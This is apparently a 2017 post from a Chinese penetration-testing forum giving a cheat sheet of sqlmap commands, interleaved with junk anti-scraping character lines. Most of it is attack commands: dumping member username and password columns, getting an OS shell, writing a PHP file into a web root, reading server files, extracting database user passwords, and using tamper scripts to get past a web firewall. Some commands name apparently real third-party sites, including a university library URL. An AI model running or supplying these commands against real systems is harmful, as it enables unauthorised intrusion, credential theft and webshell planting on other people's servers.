中国网络渗透测试联盟
标题:
sqlmap使用实例
[打印本页]
作者:
admin
时间:
2017-5-19 17:03
标题:
sqlmap使用实例
/pentest/database/sqlmap
( T! s% P0 C# q% F. h
! ]! c8 U9 ]( x2 N
update :::::> in the folder after execute following order : svn update
+ k+ A L, Y, q$ z# Z3 K/ d9 S
& X/ _! K6 a3 F+ b* g' s% S$ r
sqlmap.py -r 1.txt --current-db
# V9 C; Q9 P& a) u9 h2 O2 Q- m: R
1 Y% x! R' M! M% `* P1 D
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
% h; u. }: w2 s
& N2 P: G, c- T$ j8 W: v2 Y
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
2 I! |- k6 @$ Z" h; I
猜解数据库
- ]) H- H) j2 F
./sqlmap.py -u "injection-url" --dbs
* V3 o. c9 \" p: Z! M9 r
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
; E' E$ I2 W8 \2 f6 A
5 n4 t* N+ N4 f3 |; c ~+ i3 v
猜解表名
( x$ H( F( k5 A+ F
./sqlmap.py -u "injection-url" -D database_name --tables
, D+ v$ S: R4 q4 o% Q. q
8 r7 w6 @/ ?* l
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
R J; \/ G Z9 c# f
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
6 I) ~$ T" J) ~
- ]5 m& U+ ~/ D6 r
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
) U2 \, B0 H0 z. m
4 e: c5 }2 m; `2 v$ {6 Q
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
& k7 s- q( P) G% P; ?
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
2 ~( M9 s3 Q; k' x, n
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
$ x9 e7 Z$ @1 ?7 W0 }
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
1 o2 c# k( H1 r- E2 I
0 u4 R h! E& {+ a: b# e
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
4 G) ^, X, r. c) x
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
, N8 k5 Q; ?# W( }
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
" [( R. V6 }4 F) v* `0 i
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
& }% {1 _! W( L: c( z
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
6 k% r! J; Z: H! P
* X4 |- |" j5 i( m
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
# \3 ^( G1 B/ b. w. W( r
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
7 V/ c+ e% \5 f: f: o4 z
) C8 _' ?% g3 ~2 e C: G
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
$ y4 N/ y3 }$ S) a3 o
猜解列名
2 K9 V$ V& [1 q' V, F1 a8 c- a( T
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
z5 u& }4 n2 o2 s7 d
( _ t, }! a; j6 }! t$ l ~7 m
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
' ?& A/ n l4 {- a1 P
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
+ L( v f4 j) c. ~
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
- t- [, J' w7 f
' _! M9 O) _$ Q) p- j1 D+ v
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
* M5 V, D1 Z. e0 X
&submit=Go
; ?* L2 _4 u0 j2 y, ~
猜解值
# n1 N$ v& K- X; ], Z; |4 R" `
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
8 `; [: f! Z4 l* c( Q6 P
========================================================
W% u; J. o' A) z0 k3 y" T
搜索表名中包括mana字符的
7 H! S% f" b- y- R. `) H
/sqlmap.py -u "injection-url" -T mana --search
Y A/ Y* C# K3 ]
返回一个交互式sql shell
" a, N& n. ^' W* N8 {& u1 A
/sqlmap.py -u "injection-url" --sql-shell
; t3 q: Y& u1 d
读取指定文件(需权限)
- U8 a( V' w% g0 R9 e4 o J
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
1 Q$ Y4 {& Q, _: c( p$ o, A
查看当前 用户 及 数据库
$ m: U5 e; ^* a) w' L) d
/sqlmap.py -u "injection-url" --current-user --current-db
: G. B8 L. ?# P9 m H/ o9 [
本地文件 写入 远程目标绝对路径
: w4 |% r+ X" [4 R2 Y+ D9 X
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
4 u- V) r! o. b0 k9 g& d! G' y
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
. |& S* l* \4 o4 f- m
! {* W6 S9 B& _$ B
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
, d+ U3 }' w, c7 g# V1 q$ B
查看某用的权限
$ {4 `& U3 n) \2 x$ }* o3 r) u
/sqlmap.py -u "injection-url" --privileges -U root
1 E! y3 N. e9 z1 t4 u" m0 N' o8 _& ~
查看当前用户是否为dba
* @, x% \3 d" i+ ?
/sqlmap.py -u "injection-url" --is-dba
. D$ ]1 D4 O/ N) c$ T# c
读取所有数据库用户或指定数据库用户的密码
& a P/ F8 M( b: |% ]3 |9 B2 E
sqlmap.py -r 1.txt --users --passwords
* p4 |( J1 L& E! j4 X5 h! M4 w
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
( e7 V4 {, P# z. v
; L* G0 ?2 Z! c. W" W/ Y
/sqlmap.py -u "injection-url" --passwords -U root
' ^7 H0 J) a) }) U T$ h# t
8 D3 e v# Q- m% a& F! A7 J
--start&&--stop 与 --first&&--last 的区别
9 L! O& X- A1 B7 i! x! B" m6 k4 \
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
r9 i- E0 r. R( Y
# k) ]2 M7 h9 k' Z) o* W, R0 m+ G
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
4 S2 P/ `+ u5 {! {! I
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
& Y3 B8 T; v7 X0 i Q2 W7 K
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
& M& \* J, G& |2 f4 f! o& g" B8 N
8 G; D: `1 D6 W; l$ |. s
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
9 t* k$ D* a6 S9 G- d
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
+ R0 {% }" L( J+ d$ L! P
2 [+ D2 ]5 L3 D8 W- q' m, A
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2